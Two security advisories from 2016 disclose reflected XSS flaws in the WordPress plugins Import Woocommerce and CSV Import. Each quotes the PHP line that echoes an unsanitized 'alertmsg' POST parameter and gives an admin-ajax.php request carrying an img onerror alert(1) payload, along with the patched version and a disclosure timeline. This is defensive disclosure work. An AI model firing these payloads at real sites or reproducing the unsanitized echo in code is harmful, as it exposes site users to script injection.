Import Woocommerce XSS Vulnerability

## FULL DISCLOSURE

#Product : Import Woocommerce
#Exploit Author : Rahul Pratap Singh
#Version : 1.0.1
#Home page Link : https://wordpress.org/plugins/import-woocommerce/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 24/Feb/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
“alertmsg” parameter is not sanitized that leads to Reflected XSS.

—————————————-
Vulnerable Code:
—————————————-
File: index.php
Line:229-232

function translate_alertstr(){
if(isset($_POST[‘alertmsg’]))
echo __($_POST[‘alertmsg’],’import-woocommerce’);

die();

—————————————-
Exploit:
—————————————-
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1

action=translate_alertstr&alertmsg=”><img src=x onerror=alert(1)>

—————————————-
POC:
—————————————-
import-woocommercexsspoc

Fix:
Update to 1.1

Vulnerability Disclosure Timeline:
→ January 30, 2016     – Bug discovered, initial report to WordPress
→ February 1, 2016     – WordPress response, plugin taken down
→ February 24, 2016  – Vendor Deployed a Patch

#######################################
#                    CTG SECURITY SOLUTIONS                          #
#                www.ctgsecuritysolutions.com                        #
#######################################

Pub Ref:
https://wordpress.org/plugins/import-woocommerce/changelog/

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

CSV Import XSS Vulnerability

## FULL DISCLOSURE

#Product : CSV Import
#Exploit Author : Rahul Pratap Singh
#Version : 1.0
#Home page Link : https://wordpress.org/plugins/csv-import/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 23/Feb/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
“alertmsg” parameter is not sanitized that leads to Reflected XSS.

—————————————-
Vulnerable Code:
—————————————-
File Name: csv-import/index.php

Found at line:238

echo __($_POST[‘alertmsg’], ‘csv-import’);

—————————————-
Exploit:
—————————————-
POST /wp-admin/admin-ajax.php

action=trans_csvimp_alertstr&alertmsg=”><img src=x onerror=alert(1)>

—————————————-
POC:
—————————————-
csv-importxsspoc

Fix:
Update to 1.1

Vulnerability Disclosure Timeline:
→ January   30, 2016  – Bug discovered, initial report to WordPress
→ February 1, 2016    – WordPress response, plugin taken down
→ February 23, 2016  – Vendor Deployed a Patch

#######################################
#                    CTG SECURITY SOLUTIONS                          #
#                www.ctgsecuritysolutions.com                        #
#######################################

Pub Ref:
https://wordpress.org/plugins/csv-import/changelog/

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.